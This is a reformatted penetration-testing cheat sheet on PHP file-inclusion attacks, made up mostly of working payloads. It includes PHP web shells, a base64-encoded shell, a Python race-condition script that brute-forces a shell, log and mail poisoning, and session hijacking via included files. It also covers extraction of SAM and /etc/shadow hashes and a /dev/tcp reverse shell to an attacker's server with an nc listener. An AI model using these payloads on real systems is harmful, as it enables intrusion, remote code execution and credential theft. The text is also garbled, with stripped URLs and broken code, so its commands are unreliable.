This is not mine. I reformatted it to .md from the source below. credit: Mr. X
In the following examples, we include the /etc/passwd
file, check the Directory & Path Traversal
chapter for more interesting files.
On most PHP installations a filename longer than 4096 bytes will be cut off so any excess chars will be thrown away.[ADD MORE]\.\.\.\.\.\.[ADD MORE][ADD MORE][ADD MORE]../../../../etc/passwd
The part “php://filter” is case insensitive
NOTE :- Always try without extention if the index.php is not working with this test case . can be chained with a compression wrapper for large files.
NOTE: Wrappers can be chained multiple times : php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s
./kadimus -u "" -S -f "index.php%00" -O index.php --parameter page
curl "" | base64 -d > index.php
echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.php;
mv shell.jpg;
rm payload.php;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
Fun fact: you can trigger an XSS and bypass the Chrome Auditor with :;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
Specify your payload in the POST parameters, this can be done with a simple curl command.
curl -X POST --data "<?php echo shell_exec('id'); ?>" "" -k -v
Alternatively, Kadimus has a module to automate this attack.
./kadimus -u "" -C '<?php echo shell_exec("id"); ?>' -T input
Create a phar file with a serialized object in its meta-data.
// create new Ph
$phar = new Phar('test.phar');
$phar->addFromString('test.txt', 'text');
$phar->setStub('<?php __HALT_COMPILER(); ? >');
// add object of any class as meta data
class AnyClass {}
$object = new AnyClass;
$object->data = 'rips';
If a file operation is now performed on our existing Phar file via the php:// wrapper, then its serialized metadata is unserialized. If this application has a class named AnyClass and it has the magic method __destruct() or __wakeup() defined, then those methods are automatically invoked
class AnyClass {
function __destruct() {
echo $this->data;
// output: rips
NOTE: The unserialize is triggered for the phar:// wrapper in any file operation, file_exists and many more.
1.) Upload a lot of shells (for example : 100) 2.) Include$PID/fd/$FD, with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too)
Like a log file, send the payload in the User-Agent, it will be reflected inside the /proc/self/environ file
GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>
If you can upload a file, just inject the shell payload in it (e.g : ).
In order to keep the file readable, it is best to inject into the metadata for the pictures/doc/pdf
Worlds Quietest Let’s Play”
- Upload a file and trigger a self-inclusion.
- Repeat 1 a shitload of time to:
- increase our odds of winning the race
- increase our guessing odds
- Bruteforce the inclusion of /tmp/[0-9a-zA-Z]{6}
- Enjoy our shell.
import itertools
import requests
import sys
print('[+] Trying to win the race')
f = {'file': open('shell.php', 'rb')}
for _ in range(4096 * 4096):'', f)
print('[+] Bruteforcing the inclusion')
for fname in itertools.combinations(string.ascii_letters + string.digits, 6):
url = '' + fname
r = requests.get(url)
if 'load average' in r.text: # <?php echo system('uptime');
print('[+] We have got a shell: ' + url)
print('[x] Something went wrong, please try again') Use the script (also available at
Just append your PHP code into the log file by doing a request to the service (Apache, SSH..) and include the log file.
Try to ssh into the box with a PHP code as username <?php system($_GET["cmd"]);?>.
ssh <?php system($_GET["cmd"]);?>@
Then include the SSH log files inside the Web Application.
First send an email using the open SMTP then include the log file located at
root@kali:~# telnet 25
Connected to
Escape character is '^]'.
220 straylight ESMTP Postfix (Debian/GNU)
helo ok
250 straylight
mail from: [email protected]
250 2.1.0 Ok
rcpt to: root
250 2.1.5 Ok
354 End data with <CR><LF>.<CR><LF>
subject: <?php echo system($_GET["cmd"]); ?>
In some cases you can also send the email with the mail command line.
mail -s "<?php system($_GET['cmd']);?>" [email protected]. < /dev/null
Check if the website use PHP Session (PHPSESSID)
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/ Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly In PHP these sessions are stored into /var/lib/php5/sess_[PHPSESSID] files
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27. user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin"; Set the cookie to
login=1&user=&pass=password&lang=en_us.php Use the LFI to include the PHP session file
login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27 LFI to RCE via credentials files This method require high privileges inside the application in order to read the sensitive files.
Windows version First extract sam and system files. Then extract hashes from these files samdump2 SYSTEM SAM > hashes.txt, and crack them with hashcat/john or replay them using the Pass The Hash technique.
Linux version First extract /etc/shadow files. Then crack the hashes inside in order to login via SSH on the machine.
Basic RFI Most of the filter bypasses from LFI section can be reused for RFI. Null byte Double encoding Bypass allow_url_include When allow_url_include and allow_url_fopen are set to Off. It is still possible to include a remote file on Windows box using the smb protocol.
Create a share open to everyone Write a PHP code inside a file : shell.php Include it\\\share\shell.php Webshell A webshell is a shell that you can access through the web. This is useful for when you have firewalls that filter outgoing traffic on ports other than port 80. As long as you have a webserver, and want it to function, you can’t filter our traffic on port 80 (and 443). It is also a bit more stealthy than a reverse shell on other ports since the traffic is hidden in the HTTP traffic.
You have access to different kinds of webshells on Kali here:
/usr/share/webshells PHP This code can be injected into pages that use PHP IN ORDER TO ACCESS RFI to Shell
Remote file inclusion uses pretty much the same vector as local file inclusion.
A remote file inclusion vulnerability lets the attacker execute a script on the target-machine even though it is not even hosted on that machine.
RFI’s are less common than LFI. Because in order to get them to work the developer must have edited the php.ini configuration file.
This is how they work.
So you have an unsanitized parameter, like this
$incfile = $_REQUEST["file"]; include($incfile.".php"); Now what you can do is to include a file that is not hosted on the victim-server, but instead on the attacker’s server. And evil.txt will look like something like this:
/dev/tcp/; sh <&196 >&196 2>&196"); ?> $output"; ?>So when the victim-server includes this file it will automatically execute the commands that are in the evil.txt file. And we have an RCE. &cmd=/bin/bash – i >& /dev/tcp/ 0>&1
The second Side listen with
nc -lvp 53
Avoid extensions Remember to add the null byte %00 to avoid appending .php. This will only work on PHP before version 5.3.
If it does not work you can also add a ?, this way the rest will be interpreted as URL parameters
You can then call then execute the commands like this: Make it stealthy We can make the commands from above a bit more stealthy. Instead of passing the cards through the URL, which will be obvious in logs, we can pass them through other header-parameters. The use of tamper data or burp suite to insert the commands. Or just Netcat or curl.
Obfuscation The following functions can be used to obfuscate the code.
eval() assert() base64() gzdeflate() str_rot13() Weevely – Incredible tool! Using weevely we can create PHP web shells easily.
weevely generate password /root/webshell.php Not we execute it and get a shell in return:
weevely "" password ASP <% Dim oS On Error Resume Next Set oS = Server.CreateObject("WSCRIPT.SHELL") Call oS.Run(" cmd.exe /c c:\Inetpub\shell443.exe",0,True) %> /something/access.log injection If you have LFI access to any web server error or access log files, you can attempt to inject malicious PHP code. Once the PHP code is written to the access.log and is reloaded, it will be displayed in your web browser as processed PHP. After adding the injected variable to our URL to we’ll have code execution.
First, we’ll attempt to inject by using Netcat.
root@kali:~# nc 80
Now test if the injection was successful by including the new cmd variable into the URL.
?page=../../../../../var/log/apache2/access.log&cmd=/sbin/ifconfig Depending on the circumstance the log file may be very very big. Scroll all the way down to check if the command execution was successful.